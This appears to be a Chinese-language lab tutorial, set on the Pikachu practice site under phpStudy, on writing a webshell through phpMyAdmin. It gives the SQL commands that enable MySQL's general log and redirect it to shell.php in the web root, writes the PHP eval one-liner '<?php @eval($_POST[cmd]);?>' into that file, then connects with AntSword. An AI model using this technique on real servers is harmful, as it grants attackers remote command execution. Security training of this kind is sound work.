前情条件是:首先将我们的PHP版本设置在5.5以上 注:禁止用于未授权的测试!
首先搭建环境,登录后台
data:image/s3,"s3://crabby-images/d9b0a/d9b0ab96ea83cd64a345f38f252e8313346d54b7" alt=""
点击》》SQL
data:image/s3,"s3://crabby-images/c3c54/c3c54104eeb1aea0198d2553960abdf1ff227b74" alt=""
查看当前的日志状态
SHOW VARIABLES LIKE 'general%';
data:image/s3,"s3://crabby-images/29660/296609e99a35ac0d89ed52a1ab123869c748aac3" alt=""
因为之前我原来做过所以general_log 是开启的,如果vlau 是OFF时,可以使用
set global general_log = "ON";打开日志
然后后面打开genera_log_file 写到网站目录下
set global general_log_file='D:\\phpstudy_pro\\WWW\\pikachu-master\\shell.php'
前提是知道网站目录下
data:image/s3,"s3://crabby-images/13638/13638f65ce75d693a059458c2aee7681b10eedc2" alt=""
查看日志,看更改日志文件路径是否成功
data:image/s3,"s3://crabby-images/4b9e4/4b9e443134133e9c82d7840bf0605c95ca497534" alt=""
日志文件里写入一句话木马
select '<?php @eval($_POST[cmd]);?>';
data:image/s3,"s3://crabby-images/cd3b9/cd3b92ab46d41fa2eee01de7cd839a6a2712a011" alt=""
访问一下shell.php
http://pikachu-master/shell.php
能够成功访问
data:image/s3,"s3://crabby-images/ba892/ba892ef050ddd676f99e8b7c7c4469052847209d" alt=""
然后适用蚁剑连接
data:image/s3,"s3://crabby-images/a21a4/a21a4f9a0fb740ca5133d9c7a5e6c5ae5389d9d8" alt=""
成功连接